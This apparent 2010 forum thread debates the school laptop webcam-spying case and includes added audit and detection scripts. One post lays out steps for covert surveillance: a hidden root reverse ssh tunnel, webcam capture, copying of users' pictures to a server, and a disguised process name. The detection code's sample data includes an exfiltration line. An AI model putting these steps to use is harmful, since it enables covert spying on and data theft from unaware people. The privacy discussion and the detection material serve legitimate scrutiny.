It's a matter of the school folks downloading and installing this (or something very similar):

http://lifehacker.com/207605/hack-attack-turn-your-macbooks-isight-into-a-ftp-backed-up-security-camera

It's an open source program coupled with a few small applescripts and it dials home to an ftp server and saves a copy of the picture locally. It is also easy to write this same function in an applescript and use automator (a task automation program) to set it up to listen to phone home and to do it without the noisy aspect of the above linked software. Literally it would take an average sysadmin about 15 minutes to create. To be clear: I used to have a mac that did this exact function. I used it to periodically update a webcam aggregator site my friend ran. I have done this. It is easy. (Also, I will point out that I am a professional UNIX Administrator and OS X is UNIX. I know exactly how easy this is.) Throw the automated scripts in a cron job owned by root and no one would know as a user unless they were very skilled and knew what they were looking for.

It also has little if any central management capabilities. That means anyone who knows a little about how the IT guy put it together could snap the pictures themselves.

Macs have little effective central management abilities (there are some policy based things that can be done, but they are not as friendly to central management.) What this looks like to me is an app installed to recover stolen laptops (which is of dubious effectiveness - a smart thief simply wipes the hard drive before booting to it and installs a pirated OS, and the article says they only recovered 18 stolen laptops this way) that has little to any regulation against staff abuse built in to the software.

I wouldn't be surprised if a school official was accessing these things without IT's knowledge, despite the claim only the techs could access it. Without the ability to have centralized role based access administration to the OS itself (and Apples struggle to come close to this) anyone with the knowledge of how to do it could access it. Per the article above:

Only two employees in the technology department, not administrators, were authorized to activate the cameras, which captured still images but not sound, officials said.

It doesn't say "able to" it says "authorized." Given how careful the language from the school is, this leads me to believe that access control was by honor system.

This is exactly why some companies (mine included) are reluctant to adopt macs in a professional setting as desktops/laptops. There are other considerations as well, but lack of centralized management without a large development project behind it is one.


So the idea that the type of software described in the article doesn't even exist is dead wrong. The idea it would be difficult or expensive to implement is dead wrong. The idea that anyone with the know how at the school could access it is very plausible.
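
The control Uncayimmy asks for earlier in the thread (every activation logged automatically and cross-referenced against the request that justified it) and the gap between "authorized" and "able to" raised in the post above can both be checked mechanically. This is an added example, not part of the original posts and not the district's system; the log layout, operator names, ticket ids and the 14-day window are assumptions, and every record is constructed.

```python
"""Audit remote-capture activations against theft reports and an operator allowlist.

Everything here is an assumption made for illustration: the CSV layouts, the
operator names, the ticket ids and the 14-day validity window are constructed.
"""
import csv
import io
from datetime import datetime, timedelta

# Constructed sample: what an append-only activation log might record.
ACTIVATION_LOG = """\
timestamp,operator,laptop_id,ticket
2010-01-11T09:02:00,tech_a,LT-0412,TR-1001
2010-01-12T21:40:00,tech_b,LT-0933,
2010-01-15T08:15:00,vp_office,LT-0150,TR-1002
2010-01-20T10:00:00,tech_a,LT-0777,TR-1001
2010-02-03T14:30:00,tech_b,LT-0412,TR-1001
"""

# Constructed sample: theft/loss reports that justify an activation.
THEFT_REPORTS = """\
ticket,laptop_id,reported_at,closed_at
TR-1001,LT-0412,2010-01-10T16:00:00,2010-01-14T12:00:00
TR-1002,LT-0150,2010-01-14T11:00:00,
"""

AUTHORIZED_OPERATORS = {"tech_a", "tech_b"}  # enforce the allowlist, do not trust it
MAX_TICKET_AGE = timedelta(days=14)          # assumed policy window


def _ts(text):
    """Parse an ISO timestamp; an empty field means 'not set'."""
    return datetime.fromisoformat(text) if text else None


def load_reports(text):
    """Index theft reports by ticket id."""
    reports = {}
    for row in csv.DictReader(io.StringIO(text)):
        reports[row["ticket"]] = {
            "laptop_id": row["laptop_id"],
            "reported_at": _ts(row["reported_at"]),
            "closed_at": _ts(row["closed_at"]),
        }
    return reports


def audit(activation_text, report_text, authorized=AUTHORIZED_OPERATORS):
    """Return (timestamp, operator, laptop_id, [reasons]) for each violation."""
    reports = load_reports(report_text)
    findings = []
    for row in csv.DictReader(io.StringIO(activation_text)):
        when = _ts(row["timestamp"])
        reasons = []
        if row["operator"] not in authorized:
            reasons.append("operator-not-authorized")
        report = reports.get(row["ticket"])
        if not row["ticket"]:
            reasons.append("no-ticket")
        elif report is None:
            reasons.append("unknown-ticket")
        else:
            if report["laptop_id"] != row["laptop_id"]:
                reasons.append("ticket-for-different-laptop")
            if when < report["reported_at"]:
                reasons.append("before-report")
            if report["closed_at"] and when > report["closed_at"]:
                reasons.append("after-ticket-closed")
            elif when - report["reported_at"] > MAX_TICKET_AGE:
                reasons.append("ticket-too-old")
        if reasons:
            findings.append((row["timestamp"], row["operator"], row["laptop_id"], reasons))
    return findings


if __name__ == "__main__":
    for finding in audit(ACTIVATION_LOG, THEFT_REPORTS):
        print(finding)
```

The check only means something if the activation log is written by the capture service itself to storage the operators cannot edit.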

Upchurch
20th February 2010, 06:49 PM
It's still not fitting together for me. Apparently the school official cited as evidence a photograph "embedded" in the school-issued laptop. How does that mesh with the notion of Computer Central requesting the laptop send an image? The whole story just doesn't make sense to me yet.
Yes, we're guessing at the technical details, but so what?

Is there really any question that what is being described overall is possible? The important question here isn't how they did it precisely, but what they did and why. ...and really more the what.

Did the laptop take a picture of a student unknowingly in his home? Did the school direct the laptop to take that picture (either in real time or as some sort of cron job) without a legitimate reason to do so? Did that picture end up back in the school's possession without the student's knowledge or permission?

If the answer is "yes" to all those questions, the school is screwed. It doesn't matter if you don't understand how it could have possibly happened.

Ducky
20th February 2010, 06:54 PM
Yes, we're guessing at the technical details, but so what?

Is there really any question that what is being described overall is possible? The important question here isn't how they did it precisely, but what they did and why. ...and really more the what.

Did the laptop take a picture of a student unknowingly in his home? Did the school direct the laptop to take that picture (either in real time or as some sort of cron job) without a legitimate reason to do so? Did that picture end up back in the school's possession without the student's knowledge or permission?

If the answer is "yes" to all those questions, the school is screwed. It doesn't matter if you don't understand how it could have possibly happened.


If the answer is yes to the first question, game over in my opinion. That is a massive breach on the school's part if it indeed happened.

That it's technically possible is without question. Right now in my head I can think of 5 or 6 ways to have a script run in the background on a UNIX box, phone home, snap pictures, heck even rsync user files home, all without the user knowing if they didn't know what they were looking for.

SonOfLaertes
20th February 2010, 08:27 PM
I don't think it matters if everyone in the entire district save one are pure as driven snow and candidates for canonization. All this demonstrates is the truth of the old wisdom that if power can be abused then someone will abuse it.

If there was software installed on those computers which worked even approximately in the fashion that is being claimed then its mere presence is the transgression, not whether it is employed with discretion. There is going to be more than one assistant principal involved in making a policy decision of that sort.

Anyone involved in signing off on the installation of such software needs to be busted down to food service ... for farm animals.

After they get out of prison.

I wasn't equating wealth with virtue. I mentioned the school system's affluence to counter suggestions that the system in place couldn't be sophisticated or custom-installed by professionals.

quadraginta
20th February 2010, 08:41 PM
I wasn't equating wealth with virtue. I mentioned the school system's affluence to counter suggestions that the system in place couldn't be sophisticated or custom-installed by professionals.


You don't seem to be referring to the post of yours I quoted. It mentioned nothing about wealth, and neither did I. Perhaps you are thinking of a later post of yours, and not the one I responded to.

Uncayimmy
20th February 2010, 08:43 PM
Yes, we're guessing at the technical details, but so what?

Is there really any question that what is being described overall is possible? The important question here isn't how they did it precisely, but what they did and why. ...and really more the what.

Did the laptop take a picture of a student unknowingly in his home? Did the school direct the laptop to take that picture (either in real time or as some sort of cron job) without a legitimate reason to do so? Did that picture end up back in the school's possession without the student's knowledge or permission?

If the answer is "yes" to all those questions, the school is screwed. It doesn't matter if you don't understand how it could have possibly happened.

WTF is your problem? I never said I didn't "understand how it could have possibly happened." I said the story is still not fitting together for me yet, especially in regards to the one image that is claimed to be evidence of spying. There can be any number of answers to the questions you asked, but they alone don't explain the story of the administrator and the image.

As for whether what happened is possible, I have contended from day one that the elaborate system described in the lawsuit was possible but very unlikely and that something far less sophisticated, however, would be easy.

UNLoVedRebel
20th February 2010, 08:56 PM
Removed breach of Rule 12

Ducky
20th February 2010, 09:22 PM
WTF is your problem? I never said I didn't "understand how it could have possibly happened." I said the story is still not fitting together for me yet, especially in regards to the one image that is claimed to be evidence of spying. There can be any number of answers to the questions you asked, but they alone don't explain the story of the administrator and the image.

As for whether what happened is possible, I have contended from day one that the elaborate system described in the lawsuit was possible but very unlikely and that something far less sophisticated, however, would be easy.

I explained it quite directly. I even explained that the "elaborate system" isn't unlikely at all.

ETA: In fact, on a mac, it's not even software to install (except possibly a script to activate the webcam from the command line (http://www.intergalactic.de/pages/iSight.html)). After that it is bash/applescript and cron to schedule it to run as a root process. Hell name it something like ksyslogd2 and googling that name would give something similar to a legit UNIX process. If the user didn't have root access, they'd never know. As for everything else it is claimed to do: All of that can be done with tools provided under the hood of OS X and scripts. I can tell you from experience of doing exactly this it wouldn't cause stress on system process load and since it's all outbound connections you don't have an issue with home firewalls unless someone's tweaked their router.
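
From the laptop owner's side, the root cron job with a system-sounding name described in these posts is something that can be looked for. This is an added example, not code from the thread or from the school's setup: it triages the text of root's crontab, and the heuristics, the 0.8 similarity threshold, the daemon list and the sample crontab are assumptions constructed for illustration (it covers cron only, not other schedulers).

```python
"""Triage root's crontab for jobs that look like covert capture or phone-home tasks.

Heuristics, thresholds and the sample crontab are assumptions constructed for
this example; on a real machine feed in the output of `sudo crontab -l`.
"""
import difflib
import os
import re
import shlex

SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/")
KNOWN_DAEMONS = ("syslogd", "klogd", "launchd", "cron", "configd", "notifyd")
TRANSFER_TOOLS = {"ftp", "curl", "rsync", "scp", "sftp", "nc"}
CAMERA_WORDS = re.compile(r"isight|webcam|camera|snapshot", re.IGNORECASE)
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

# Constructed sample of what `sudo crontab -l` could print.
SAMPLE_ROOT_CRONTAB = """\
# root crontab (constructed)
MAILTO=""
15 3 * * * /usr/sbin/periodic daily
*/15 * * * * /var/db/.helper/ksyslogd2 --quiet
@hourly /usr/bin/rsync -a /Users/ collector.example.invalid:/archive/
0 2 * * 0 /usr/local/bin/rotate-logs.sh
"""


def split_entry(line):
    """Return the command part of a user-crontab line, or None for non-job lines."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    shortcut = line.startswith("@")          # @reboot, @hourly, ...
    fields = line.split(None, 1 if shortcut else 5)
    expected = 2 if shortcut else 6
    return fields[-1] if len(fields) == expected else None


def lookalike(name):
    """Name a known daemon that `name` imitates without being identical to it."""
    for daemon in KNOWN_DAEMONS:
        if name != daemon and difflib.SequenceMatcher(None, name, daemon).ratio() >= 0.8:
            return daemon
    return None


def triage(crontab_text):
    """Return {command: [reasons]} for every job that trips at least one heuristic."""
    findings = {}
    for line in crontab_text.splitlines():
        command = split_entry(line)
        if command is None:
            continue
        try:
            argv = shlex.split(command)
        except ValueError:                   # unbalanced quotes: report, do not skip
            findings[command] = ["unparseable-command"]
            continue
        exe = argv[0]
        name = os.path.basename(exe)
        reasons = []
        if not exe.startswith(SYSTEM_DIRS):
            reasons.append("outside-system-dirs")
        if any(part.startswith(".") for part in exe.split("/") if part):
            reasons.append("hidden-path-component")
        imitated = lookalike(name)
        if imitated:
            reasons.append("name-imitates-" + imitated)
        if name in TRANSFER_TOOLS or any(os.path.basename(a) in TRANSFER_TOOLS for a in argv[1:]):
            reasons.append("network-transfer")
        if CAMERA_WORDS.search(command):
            reasons.append("camera-keyword")
        if reasons:
            findings[command] = reasons
    return findings


if __name__ == "__main__":
    for cmd, why in triage(SAMPLE_ROOT_CRONTAB).items():
        print(len(why), cmd, why)
```

A single reason such as `outside-system-dirs` is common for legitimate admin scripts; entries that collect several reasons are the ones to inspect first.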

quadraginta
20th February 2010, 09:36 PM
Yes, we're guessing at the technical details, but so what?
<snip>
If the answer is "yes" to all those questions, the school is screwed. It doesn't matter if you don't understand how it could have possibly happened.



WTF is your problem? I never said I didn't "understand how it could have possibly happened." I said the story is still not fitting together for me yet, especially in regards to the one image that is claimed to be evidence of spying. There can be any number of answers to the questions you asked, but they alone don't explain the story of the administrator and the image.

As for whether what happened is possible, I have contended from day one that the elaborate system described in the lawsuit was possible but very unlikely and that something far less sophisticated, however, would be easy.


In one of your first posts in this thread you said ...

<snip>
I challenge you or anyone else to produce examples of off-the-shelf software that allows a central computer to surreptitiously track and control webcams on multiple computers. I'm tech savvy, and I'm telling you that I have never seen any off-the-shelf software that does what is described in the filing. I could write such a program, but that means that the school would have to pay for custom software.

The significance of this is that such a software request would not be cheap, and it would become widely known in the school district. It's just one more piece of evidence that says this story is most likely ********:
<snip>


I think it is reasonable to consider the OS that the laptop shipped with and open-source freeware as either "off-the-shelf" or "cheap"

Ducky shared with us that not only are simple open source programs specifically intended for such tasks freely available on the net, but that a proficient UNIX sysadmin with root access could write their own scripts to perform such a function without difficulty, and this would not be easily apparent to the average user.

<snip important body of text. Good stuff if you missed this post.>

So the idea that the type of software described in the article doesn't even exist is dead wrong. The idea it would be difficult or expensive to implement is dead wrong. The idea that anyone with the know how at the school could access it is very plausible.

As SonOfLaertes pointed out...

<snip>
Lower Merion is a very wealthy school district, many of its students come from the "Main Line" (watch the movie "The Philadelphia Story" to get a sense of the Main Line). Many of its students go on to attend Ivy League colleges. So I guess my point is that this is a school district with a lot of money; I'm quite sure that their IT and administrative staff is top-notch, the best money can buy.
<snip>


So, making allowances for modest and restrained hyperbole I can understand how Upchurch came to the conclusion he did about your lack of understanding. I had the same impression myself.

Uncayimmy
20th February 2010, 10:20 PM
In one of your first posts in this thread you said ...

I think it is reasonable to consider the OS that the laptop shipped with and open-source freeware as either "off-the-shelf" or "cheap"

Ducky shared with us that not only are simple open source programs specifically intended for such tasks freely available on the net, but that a proficient UNIX sysadmin with root access could write their own scripts to perform such a function without difficulty, and this would not be easily apparent to the average user.

I'm very well aware of what I said. I went on to clarify that I was talking about everything claimed in the lawsuit. What Ducky describes and what we have later learned is nowhere near what is claimed in the lawsuit. Furthermore, as I have pointed out already, there is a difference between "not apparent to the average user" and being so hidden that not a single nosy teenager was able to spot this software that is allegedly being used to spy on people.

So, making allowances for modest and restrained hyperbole I can understand how Upchurch came to the conclusion he did about your lack of understanding. I had the same impression myself.
It sounds to me like somebody who didn't read the full text of the lawsuit and who didn't read my posts in their entirety is trying to tell me what I did or did not understand.

To quote myself:
Read the frigging lawsuit. It talks about how clandestine and powerful this "spying" software is. I'm saying that nothing like this exists commercially, so that makes it even less likely that what they claim actually exists. In rebuttal I'm having people tell me, "Well, there's some software that does some of what is claimed. It's installed just like ordinary software, so anybody can see it."

Of course, none of these technical issues have any direct bearing on why the administrator would be pointing to an image stored locally on the student's laptop. That just strikes me as odd as does why the administrator would be talking to the student about inappropriate behavior at home in the first place. It's entirely plausible that the image in question is totally unrelated to the ability of the school to activate the webcams remotely. For example, the student could have been "in trouble" over something else, and the administrator confiscated the laptop. While examining the laptop, she saw some questionable images. Then, through further conversation, this security feature is mentioned. It doesn't mean that it was used to acquire the image. It doesn't mean it wasn't, which is why I say I find it confusing.

If you read the lawsuit carefully, it does not allege that the image in question was captured at the request of the school system nor does it allege that the student denies any knowledge of how the image was acquired (meaning he could have simply taken it himself). It doesn't describe how the administrator knew the image was on the laptop. I find this puzzling.

Ducky
20th February 2010, 11:00 PM
I'm very well aware of what I said. I went on to clarify that I was talking about everything claimed in the lawsuit. What Ducky describes and what we have later learned is nowhere near what is claimed in the lawsuit. Furthermore, as I have pointed out already, there is a difference between "not apparent to the average user" and being so hidden that not a single nosy teenager was able to spot this software that is allegedly being used to spy on people.


It sounds to me like somebody who didn't read the full text of the lawsuit and who didn't read my posts in their entirety is trying to tell me what I did or did not understand.

To quote myself:


Of course, none of these technical issues have any direct bearing on why the administrator would be pointing to an image stored locally on the student's laptop. That just strikes me as odd as does why the administrator would be talking to the student about inappropriate behavior at home in the first place. It's entirely plausible that the image in question is totally unrelated to the ability of the school to activate the webcams remotely. For example, the student could have been "in trouble" over something else, and the administrator confiscated the laptop. While examining the laptop, she saw some questionable images. Then, through further conversation, this security feature is mentioned. It doesn't mean that it was used to acquire the image. It doesn't mean it wasn't, which is why I say I find it confusing.

If you read the lawsuit carefully, it does not allege that the image in question was captured at the request of the school system nor does it allege that the student denies any knowledge of how the image was acquired (meaning he could have simply taken it himself). It doesn't describe how the administrator knew the image was on the laptop. I find this puzzling.

That's a nice side step away from the technical discussion and your own words about the accessibility and cost effectiveness of what the school's technical support staff could do remotely.

So by your answer here do I take it you're rescinding the following statement of yours?

I challenge you or anyone else to produce examples of off-the-shelf software that allows a central computer to surreptitiously track and control webcams on multiple computers. I'm tech savvy, and I'm telling you that I have never seen any off-the-shelf software that does what is described in the filing. I could write such a program, but that means that the school would have to pay for custom software.

Bold mine.

I've not only shown off the shelf software that does it, I showed the school wouldn't have to pay for that software (only the tech support admin's salary to implement it.) I also showed it could be construed as surreptitious and hidden from the user.

Tell you what, you name the requirements you think the lawsuit's description requires of the software and I will show with step-by-step instructions exactly how to do it with existing software freely available to the public. I'll even write the scripts involved to automate it and post them here for others to peer review. Since we know the school's laptops are macs I'll tailor what I do to that, however the OS has little bearing on the general concepts I will show. It could be done on any operating system. It also can be done without regard to whether the laptop is connected to the school's network.

I do not guarantee it will be the same as how the school does it, as in UNIX there are 1500 ways to awk your cat, but I will demonstrate one way to do it. I will even give my hours put into creating the system and normal hourly billing rate for services to show how much it would cost in man hours.

I'll even help out by providing relevant descriptions from the lawsuit documents:

http://forums.randi.org/picture.php?albumid=299&pictureid=2438

Which is descriptive in saying not only does the webcam need to be remote controlled but any other data available to the operating system needs to be accessible remotely to a school administrator.

Shall I put together the post documenting how easy and cheap it is to do that for a whole fleet of laptops running OS X?

Or would you prefer to admit your technical assessment of the software as described in the OP article and the PDF of the lawsuit was uninformed?

JWideman
20th February 2010, 11:45 PM
Although a tiny green diode lights up when the MacBook's iSight camera, mounted just above the screen, is recording, school administrators allegedly warned about a bug - well-documented online by other MacBook users - that made the light come on randomly.
http://www.philly.com/philly/business/technology/20100219_Remotely_accessing_a_laptop_is_fairly_easy.html

Ducky
20th February 2010, 11:47 PM
http://www.philly.com/philly/business/technology/20100219_Remotely_accessing_a_laptop_is_fairly_easy.html

This is pretty good evidence they were intentionally hiding their activity to surreptitiously take pictures/monitor students.

quadraginta
20th February 2010, 11:57 PM
<snip>

I've not only shown off the shelf software that does it, I showed the school wouldn't have to pay for that software (only the tech support admin's salary to implement it.) I also showed it could be construed as surreptitious and hidden from the user.

Tell you what, you name the requirements you think the lawsuit's description requires of the software and I will show with step-by-step instructions exactly how to do it with existing software freely available to the public. I'll even write the scripts involved to automate it and post them here for others to peer review. Since we know the school's laptops are macs I'll tailor what I do to that, however the OS has little bearing on the general concepts I will show. It could be done on any operating system. It also can be done without regard to whether the laptop is connected to the school's network.

I do not guarantee it will be the same as how the school does it, as in UNIX there are 1500 ways to awk your cat, but I will demonstrate one way to do it. I will even give my hours put into creating the system and normal hourly billing rate for services to show how much it would cost in man hours.

<snip>

Leaving aside the pleasure of poking UncaYimmy (which I am guilty of sharing :blush:) this brings up a couple of questions I'd like for you to offer an opinion on.

One of the skepticisms mentioned in this thread so far is that a school full of computer savvy students would not go for very long without being aware of such function being implemented on these school supplied computers. I'm not quite so certain about that. My experience with users (going back to the early 80's) is that most own only the very minimum of technical knowledge required to perform whatever tasks they are interested in, and no more, if even that much. I would suspect that only the usual vanishingly small percentage of "techno-geeks" would be apt to stumble across scripts in the root code and understand what they were for.

It occurred to me that the normal reaction in such a case would not be to spread the word, but rather to see if they could hack the system and take advantage of the opportunity to use the feature themselves.

Where I'm going with this is wondering if there might be a "tip of the iceberg" sort of situation, where far more "unauthorized users" than a rogue assistant principal could be involved. That could become very embarrassing, and is at the core of my belief that the problem is not how such a system is being used, but that it is being implemented at all.

Another thought relates to your offer to UncaYimmy of providing an example of such an implementation. I think it would be beneficial for such examples to be widely broadcast along with simple step-by-step instructions for non-techies to be able to check their own computers and identify whether or not such processes were installed there. Maybe even with some fixes. You mentioned something about router settings in an earlier post which might be useful to the less adept, by way of example.

I have to think that this instance is probably not isolated, and that other schools and perhaps even businesses may be running scared. Their first instincts are going to be to try to suppress and minimize. An open air educational campaign could be very enlightening.

Ducky
21st February 2010, 12:32 AM
Leaving aside the pleasure of poking UncaYimmy (which I am guilty of sharing :blush:) this brings up a couple of questions I'd like for you to offer an opinion on.

One of the skepticisms mentioned in this thread so far is that a school full of computer savvy students would not go for very long without being aware of such function being implemented on these school supplied computers. I'm not quite so certain about that. My experience with users (going back to the early 80's) is that most own only the very minimum of technical knowledge required to perform whatever tasks they are interested in, and no more, if even that much. I would suspect that only the usual vanishingly small percentage of "techno-geeks" would be apt to stumble across scripts in the root code and understand what they were for.

It occurred to me that the normal reaction in such a case would not be to spread the word, but rather to see if they could hack the system and take advantage of the opportunity to use the feature themselves.

Where I'm going with this is wondering if there might be a "tip of the iceberg" sort of situation, where far more "unauthorized users" than a rogue assistant principal could be involved. That could become very embarrassing, and is at the core of my belief that the problem is not how such a system is being used, but that it is being implemented at all.

Another thought relates to your offer to UncaYimmy of providing an example of such an implementation. I think it would be beneficial for such examples to be widely broadcast along with simple step-by-step instructions for non-techies to be able to check their own computers and identify whether or not such processes were installed there. Maybe even with some fixes. You mentioned something about router settings in an earlier post which might be useful to the less adept, by way of example.

I have to think that this instance is probably not isolated, and that other schools and perhaps even businesses may be running scared. Their first instincts are going to be to try to suppress and minimize. An open air educational campaign could be very enlightening.

Well....Sure. Let me state directly that I am not posting this to encourage any illegal actions or activities. This is purely a demonstrational post on administrative functions.

So I don't know exactly how the school did it, but here's some quick notes on how it could be done, along with ways to check your own mac for issues like this:

Firstly, were I the administrator I would have a publicly accessible return path for a remote protocol. In this case I'll choose ssh, as it's built in to OS X (and unix/linux) and is easy to script.

So imagine from the public domain, and the internal network I have server1.schooldomain.edu that ran an SSH service I could come back to. With internal DNS on the school network, and external DNS for elsewhere then any ssh traffic pointed at that server would hit correctly. Knowing that, I would also make sure a fleet of laptops would have numeric and incremental hostnames. On Macs, your hostname is name.local so in this case the hostname would be 123456.local. I do this to correlate connections and data as I will demonstrate later.

From there I would do the following before it even got to the student's hands:

set numeric hostname:

1) Open a Terminal window and enter the following commands pressing "enter" after each one.
2) sudo hostname your-host-name-here
3) sudo scutil --set LocalHostName $(hostname)
4) sudo scutil --set HostName $(hostname)

Create startup scripts for laptop:

http://oreilly.com/pub/a/mac/2003/10/21/startup.html

Once that is done, create ssh keys to use passwordless authentication for scripting:

http://developer.apple.com/mac/library/DOCUMENTATION/Darwin/Reference/ManPages/man1/ssh-keygen.1.html

http://www.cyberciti.biz/tips/ssh-public-key-based-authentication-how-to.html

this means when I put the authorized_keys file and ssh keys in root's home directory (technically ~/.ssh/authorized_keys ) I can ssh back and forth between the laptop and the server with no need for a password authentication.

Then I would have a script that would do the following when a network connection is detected:

##get host name:

$port=echo $HOSTNAME | sed -e 's/.local*//'

##sh tunnel back to school server (to be done when network connection is detected):

ssh -R $port:localhost:22 user@schoolnetwork.edu 'ping -s yahoo.com'

The above creates a connection on the server that can be accessed by doing the following:

ssh root@localhost:$port (which would be the same as the hostname of the computer.) The ping command piped in is to ensure the connection stays active. It's a dirty hack way of doing it, but I'm pretty much just pulling this off the top of my head right now.

now that we have the connection, we place the script to activate the webcam:

found here: http://www.intergalactic.de/pages/iSight.html

rsync isightcapture.script root@localhost:/bin/ -p $port

now that it's in place, log in and capture:

ssh root@localhost:$port

(bash prompt)$ ./premadescript.sh

Which would contain the following types of things:

set date:

$date = date +%Y%M%H%M%S

get host name:

$port=echo $HOSTNAME | sed -e 's/.local*//'

/bin/isightcapture $port.$date.jpg

send it (and all others) home:

scp $port.*.jpg user@schooldomain.edu:~/

Want to search their user directory for porn? Ok.

Pictures first:

declare -a array
array=($(find /Users -name *.jpg))

send them back to the school's server, rate limited to avoid overloading network connections:

rsync -a --bwlimit=20 $array user@schooldomain.edu:~/$port.pics/

The same could be done with any file extension: .mkv .avi etc. Find commands are processor intense sometimes, so you can renice it to avoid stepping on running processes:

http://en.wikipedia.org/wiki/Nice_%28Unix%29

Or, you could just remotely execute a backup of their whole home directory. here's some instructions on scripting that:

http://www.linux.com/archive/feed/121604

On a funny side note, you want the mac to speak directly to the student in a creepy voice? log in and execute this command remotely:

(bash prompt)$ say "Big Brother is watching you."

On OS X that executes the speech synthesis module of the OS and speaks the words in quotes. Mac users out there: open a terminal from Applications/Utilities/Terminal.app and try it out.

The above is a very informal mix of bash script language and regular notes on my part. Not to be taken as a working script.

So how do you test to see if you have these processes running?

Open a terminal and check for ssh traffic:

(bash prompt)$ netstat -a -p tcp

This will also show if you are connected to the school's server by hostname or IP. You could, if only IP's are shown, use the host command to see who it is:

host 123.456.789.101

Or you could use lsof to see if root is doing anything to your home directory, and by what process then google for the process. I am assuming the student doesn't have root access or I would suggest using dtrace to see what those processes are doing.

Unprivileged users can't read root's home directory, but if you have sudo (a command to execute things as root from your own account) you could do a find for ssh host keys:

sudo find / -name '*.rsa'

or

sudo find / -name '*.dsa'

Conversely, blocking outgoing traffic on essential service ports on your home router may help, but if you are at a coffee house, that's probably not going to work. If you're logged in as a user, you theoretically can change the firewall settings on your mac in the control panel without root privileges. I haven't tested that one yet tho.

So let's see, I wasted about 40 minutes typing this instead of the actual scripts, which would be roughly the same time. Set up per laptop would be half an hour to an hour (let's say an hour for billing purposes) per laptop as they came in and went out to students, and maybe an hour to set up all the scripts server-side to one-line command the functions I want to do. That's a static time bill of 2-3 hours and 1 hour per laptop at 200/hr (my rate, a tape-monkey admin with minimal scripting skills would be much less, say 50/hr generously.) Grand total for it would be my salary for whatever time spent. If I am smart, I automate the setup process for the policies and scripts needed on the laptop and I can do 100 at a time connected to the network at school.

To fix for the user, since you have physical control, you could use a boot disk to mount the hard drive from a live CD, and remove the scripts/ssh keys in root's home directory. Instructions here:

http://www.bootdisk.com/
http://www.insanelymac.com/forum/index.php?showtopic=54376

For more ideas, check this link for forensic analysis of a compromised unix/linux server:

http://blog.larsstrand.org//article.php?story=HollidayCracking

Did I leave anything out?
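
The self-check described in the post above (look at ssh traffic, then at the process behind it), as an added example that is not part of the original post: it flags ssh clients started with a remote forward and TCP sockets on port 22. It assumes the output layout of `ps -axo user,pid,command` and `netstat -an -p tcp` on a Mac; the sample data, host names and addresses are constructed placeholders.

```shell
#!/bin/sh
# Added example, not the poster's code. Both samples are constructed;
# host names and addresses are documentation placeholders.

# Constructed sample of `ps -axo user,pid,command` output.
SAMPLE_PS='USER   PID COMMAND
root     1 /sbin/launchd
alice  412 /Applications/Safari.app/Contents/MacOS/Safari
root   733 ssh -R 12345:localhost:22 user@server1.example.edu ping -s example.com
alice  801 ssh alice@shell.example.org
root   950 /usr/sbin/sshd'

# Constructed sample of `netstat -an -p tcp` output. macOS prints the
# port as the last dot-separated component of each address.
SAMPLE_NETSTAT='Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  192.0.2.20.49312       203.0.113.10.22        ESTABLISHED
tcp4       0      0  192.0.2.20.49320       198.51.100.7.443       ESTABLISHED
tcp4       0      0  *.22                   *.*                    LISTEN'

# Read ps output on stdin; print "user pid forward-spec" for every ssh
# client that requests a remote forward. A binary renamed to something
# other than ssh is not matched by this name-based check.
find_reverse_tunnels() {
    awk 'NR > 1 && ($3 == "ssh" || $3 ~ /\/ssh$/) {
        for (i = 4; i <= NF; i++) {
            if ($i ~ /^-[A-Za-z0-9]*R$/ && i < NF) {
                print $1, $2, $(i + 1)       # "-R spec" or "-fNR spec"
            } else if ($i ~ /^-R./) {
                print $1, $2, substr($i, 3)  # "-Rspec"
            }
        }
    }'
}

# Read numeric netstat output on stdin; report established connections
# to a remote port 22 and a local listener on port 22 (Remote Login on).
ssh_sockets() {
    awk '$1 ~ /^tcp/ {
        if ($6 == "ESTABLISHED" && $5 ~ /\.22$/) print "outbound-ssh", $5
        else if ($6 == "LISTEN" && $4 ~ /\.22$/) print "sshd-listening", $4
    }'
}

# Run both checks. Prints the findings and returns 1 when anything is
# flagged, returns 0 when the machine looks clean.
# On a real machine:
#   audit "$(ps -axo user,pid,command)" "$(netstat -an -p tcp)"
audit() {
    findings=$(
        printf '%s\n' "$1" | find_reverse_tunnels | sed 's/^/reverse-tunnel /'
        printf '%s\n' "$2" | ssh_sockets
    )
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}

audit "$SAMPLE_PS" "$SAMPLE_NETSTAT" || true
```

A finding is a prompt to look closer, not proof of monitoring: an ordinary outbound ssh session the user started also shows up as `outbound-ssh`.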

quadraginta
21st February 2010, 12:54 AM
<snip>

Did I leave anything out?


Seems pretty complete to me.

Many thanks.

Do you think it's unreasonable to consider the OS that ships with a consumer laptop to be "off-the-shelf software"?

This sort of FUBAR was probably inevitable once laptops with built in webcam, microphone and wifi became ubiquitous. I have a suspicion that similar situations will be surfacing RSN.

What do you think?

Ducky
21st February 2010, 12:56 AM
Left this out:

The one thing I couldn't hide easily is the green light that pops on when the cam is activated. However, as was noted earlier, the school district actually took pains to disguise that light coming on under the assumption that it was a bug in the OS of the laptops. (http://forums.randi.org/showthread.php?postid=5640180#post5640180)

This to me answers the idea that it was knowing activity and intended to be hidden from students. I'd say that answers the quotient of whether this was intended to be masked, and thusly could be used (and was) for spying.

Ducky
21st February 2010, 12:58 AM
Seems pretty complete to me.

Many thanks.

Do you think it's unreasonable to consider the OS that ships with a consumer laptop to be "off-the-shelf software"?

This sort of FUBAR was probably inevitable once laptops with built in webcam, microphone and wifi became ubiquitous. I have a suspicion that similar situations will be surfacing RSN.

What do you think?


I'd say the OS that ships with the laptop is surely off the shelf. If it's accessible when you buy the thing, then it's accessible to anyone who owns the same OS. That's off the shelf to me. I should point out, however, that the tools I showed above are part of the GNU tool set and freely download-able whether you have OS X or not. with cygwin, they even run on windows machines (with the exception of the isightcapture script. That's specific to the macs, but once you have the driver software for the webcam, you can make a script that does the same thing in windows.)

To be fair: In a corporate environment using these types of tactics (though not with webcams to watch things) has been the norm for a long time. Corporate laptops have long been given to workers with the ability for the company to remotely access it. That part isn't much different from what the school district did. What's different is that the school district is in a very different legal stance than a company is.

Ladewig
21st February 2010, 05:17 AM
